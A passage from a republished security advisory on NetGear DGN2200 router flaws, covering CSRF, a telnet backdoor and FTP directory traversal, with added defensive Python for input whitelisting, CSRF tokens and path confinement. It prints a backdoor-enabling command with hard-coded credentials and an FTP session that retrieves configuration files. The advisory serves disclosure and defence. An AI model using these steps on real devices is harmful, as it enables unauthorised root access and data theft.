NetGear N300 DGN2200 Multiple Security Vulnerabilities (3)


Solution
--------
Validate untrusted user input against a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops ('.') and hyphens ('-').
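An added example (not from the advisory or from NetGear's firmware) of the whitelist above applied to a hostname before it reaches a ping or DNS helper. The label rules and the hypothetical `ping_argv` helper go beyond the advisory's minimum whitelist and are assumptions; the point they add is that a value starting with '-' passes the bare character whitelist yet would be parsed as an option by the helper.

```python
import re

# Whitelist from the advisory's solution: ASCII letters, digits, '.' and '-'.
# fullmatch is used rather than match + '$' so a trailing newline is rejected.
_HOSTNAME_CHARS = re.compile(r"[A-Za-z0-9.-]+")
# Added assumption: RFC 1123 label shape (no empty labels, no leading or
# trailing hyphen, at most 63 chars). Rejecting a leading hyphen matters on
# its own: the bare whitelist still accepts values that a ping or lookup
# helper would read as command-line options.
_LABEL = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def is_valid_hostname(value):
    """Return True only if value is a hostname built from whitelisted characters."""
    if not isinstance(value, str) or not value or len(value) > 253:
        return False
    # Reject anything outside the whitelist first; this covers shell
    # metacharacters, whitespace, NUL bytes and non-ASCII in one step.
    if not _HOSTNAME_CHARS.fullmatch(value):
        return False
    # A single trailing dot (fully qualified name) is allowed.
    stripped = value[:-1] if value.endswith(".") else value
    return all(_LABEL.fullmatch(label) for label in stripped.split("."))


def ping_argv(value):
    """Build the argv for a ping helper without ever invoking a shell.

    Hypothetical helper: raises ValueError on rejected input so the caller
    cannot forward an unchecked value, and returns an argv list so that no
    shell parses the value even after it has been validated.
    """
    if not is_valid_hostname(value):
        raise ValueError("rejected hostname")
    return ["ping", "-c", "3", value]
```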

4.  No Cross-Site Request Forgery (CSRF) Protection
===================================================

Requires
--------
Luring a logged-in admin user into following a malicious link


Description
-----------
An attacker can lure a user into following an untrusted link to a malicious webpage that exploits the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind'; however, this does not detract from the threat.

The command execution vulnerabilities described above can be performed through CSRF.


Impact
------
Using this vulnerability, BAE Systems was able to update the configuration of the device, including changing WPA keys, altering firewall rules and performing command execution through exploitation of the ping and DNS features.


Solution
--------
Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.
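An added example (not the advisory's or NetGear's code) of the token check described above, gating the kind of state-changing admin action the advisory lists (firewall rule, WPA key, ping/DNS helper). The server secret, session id, form field name and `handle_admin_action` shape are assumptions; the check treats a missing token and a wrong token identically, which is the "present and correct" requirement in the solution.

```python
import hashlib
import hmac
import secrets

# Constructed stand-in for a per-boot server secret. On a real device this
# would live in the firmware's session store, never in a page or a form.
_SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Derive the anti-CSRF token for one login session.

    The server embeds this value in every form as a hidden field; a page on
    another origin cannot read it, so a forged cross-site POST lacks it.
    """
    return hmac.new(_SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_check(session_id, form):
    """True only if the token is present AND correct for this session."""
    supplied = form.get("csrf_token")
    if not isinstance(supplied, str):
        return False
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(supplied, csrf_token_for(session_id))


def handle_admin_action(session_id, form, apply_change):
    """Gate a state-changing router action on the CSRF check before anything
    is applied. Hypothetical handler shape; the session cookie is assumed to
    have been validated upstream, which on its own does not stop CSRF.
    """
    if not csrf_check(session_id, form):
        return 403, "missing or invalid anti-CSRF token"
    apply_change(form.get("value", ""))
    return 200, "applied"
```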

5.  Gearguy/Geardog Telnet Backdoor
===================================

Requires
--------
Ability to telnet to port 23 (only on LAN side by default)


Description
-----------
There is a backdoor (feature) built into many NetGear devices that lets a user gain operating-system command access without a password. This issue has been previously reported in other NetGear devices.

NetGear provides a Windows executable to do this. A Linux client is available from

Send a Blowfish-encrypted message to port 23 from the LAN. On reconnecting, the device provides a shell without requiring a password.


Impact
------
Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.


Proof of concept
----------------
    python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
    Sent telnet enable payload to '192.168.0.1:23'


Solution
--------
Remove the backdoor feature from the device. If a 'last resort' admin console or reset function is required, implement it so that it requires interaction with the device, so that only a person with physical access to the device is able to use this function.

6.  FTP Insecure Root Directory
===============================

Requires
--------
FTP to be enabled (not enabled by default)


Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains the files intended to be shared by FTP.
It is possible to list and retrieve files in the / folder; however, the user is prevented from using the cd (CWD) command to change the current directory to '/'.


Impact
------
Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.


Proof of concept
----------------
    root@bt# ftp 192.168.0.1
    Connected to 192.168.0.1.
    230 User logged in.
    Name (192.168.0.1:root): ftp
    230 User logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT 192.168.0.6:49211 OK
    150 BINARY data connection established.
    lrwxrwxrwx  1 nobody  root    18 Jan 01  2003 USB_Storage
    226 Directory list has been submitted.
    ftp> cd /
    550 Error: Access Denied.
    ftp> ls /
    200 PORT 192.168.0.6:55927 OK
    150 BINARY data connection established.
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 all_no_password
    -rw-r--r--  1 nobody  root    1700 Jan 01  2003 bftpd.conf
    drwxr-xr-x  3 nobody  root    0 Jan 01  2003 conf
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 lan3_time
    -r--r--r--  1 nobody  root    1430 Jan 01  2003 lan_dev
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 lan_time
    drwxr-xr-x  48 nobody  root    0 Jan 01  2003 mnt
    -rw-r--r--  1 nobody  root    1 Jan 01  2003 opendns.flag
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 opendns.tbl
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 opendns_auth.tbl
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 ppp
    -rw-r--r--  1 nobody  root    38 Jan 01  2003 resolv.conf
    -rw-r--r--  1 nobody  root    208 Jan 01  2003 ripd.conf
    drwxr-xr-x  4 nobody  root    0 Jan 01  2003 samba
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 shares
    -rw-r--r--  1 nobody  root    262 Jan 01  2003 space_info
    -rw-------  1 nobody  root    2 Oct 14 14:15 timesync
    -rw-r--r--  1 nobody  root    242 Jan 01  2003 udhcpd.conf
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 udhcpd.leases
    -rw-r--r--  1 nobody  root    4 Jan 01  2003 udhcpd.pid
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 udhcpd_resrv.conf
    -rw-r--r--  1 nobody  root    3562 Jan 01  2003 upnp_xml
    drwxr-xr-x  2 nobody  root    0 Jan 01  2003 usb_vol_name
    drwxr-xr-x  11 nobody  root    0 Jan 01  2003 var
    -r--r--r--  1 nobody  root    1922 Jan 01  2003 wan_dev
    -rw-r--r--  1 nobody  root    3 Jan 01  2003 wan_time
    drwxr-xr-x  2 nobody  root    0 Jan 01  1999 wlan
    -rw-r--r--  1 nobody  root    2 Jan 01  2003 wlan_time
    -rw-r--r--  1 nobody  root    0 Jan 01  2003 zebra.conf
    226 Directory list has been submitted.
    ftp>
    ftp> get /bftpd.conf
    local: ./bftpd.conf remote: /bftpd.conf
    200 PORT 192.168.0.5:53750 OK
    150 BINARY data connection established.
    226 File transmission successful.
    1454 bytes received in 0.00 secs (3256.7 kB/s)


Solution
--------
Enforce the folder restriction to the /shares folder for all FTP commands.
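An added example (not the advisory's code, and not bftpd's) of the confinement the solution asks for: one path check applied to every FTP command that takes a path, not only CWD. The temporary directory layout is constructed to mirror the proof of concept above, with a sensitive bftpd.conf outside the share root and a symlink inside it; the check resolves symlinks before comparing, because the listing above shows USB_Storage is itself a symlink. Function names and the `/shares` root are assumptions.

```python
import os
import tempfile


def resolve_in_root(root, cwd, requested):
    """Map a client FTP path (absolute, or relative to the client's cwd) to a
    filesystem path guaranteed to lie under root, else raise PermissionError.

    The client-visible '/' is the share root, never the filesystem root, and
    the same check is applied to every path-taking command (LIST, NLST, RETR,
    STOR, CWD, ...). Symlinks are resolved before the comparison, so a link
    inside the share cannot lead out of it.
    """
    real_root = os.path.realpath(root)
    virtual = requested if requested.startswith("/") else cwd.rstrip("/") + "/" + requested
    candidate = os.path.realpath(os.path.join(real_root, virtual.lstrip("/")))
    # commonpath is segment-aware: '/shares_x' is not inside '/shares'.
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise PermissionError("550 Error: Access Denied.")
    return candidate


def demo():
    """Exercise the check on a constructed layout: a sensitive bftpd.conf
    outside the share root and a symlink inside it that points above root."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "shares")
    os.makedirs(os.path.join(root, "public"))
    with open(os.path.join(base, "bftpd.conf"), "w") as fh:   # outside the share
        fh.write("constructed\n")
    with open(os.path.join(root, "public", "readme.txt"), "w") as fh:
        fh.write("shared\n")
    os.symlink(base, os.path.join(root, "USB_Storage"))        # escapes the root
    cases = {
        "share file": ("/", "public/readme.txt"),
        "dotdot": ("/public", "../../bftpd.conf"),
        "symlink": ("/", "USB_Storage/bftpd.conf"),
    }
    results = {}
    for name, (cwd, req) in cases.items():
        try:
            resolve_in_root(root, cwd, req)
            results[name] = "allowed"
        except PermissionError:
            results[name] = "denied"
    return results
```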

7.  Cannot Disable WPS
======================

Requires
--------
Local proximity and WiFi enabled

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reproducing, credit the source: http://www.heiqu.com/66210a44fb37e8f0727b488fcf93708a.html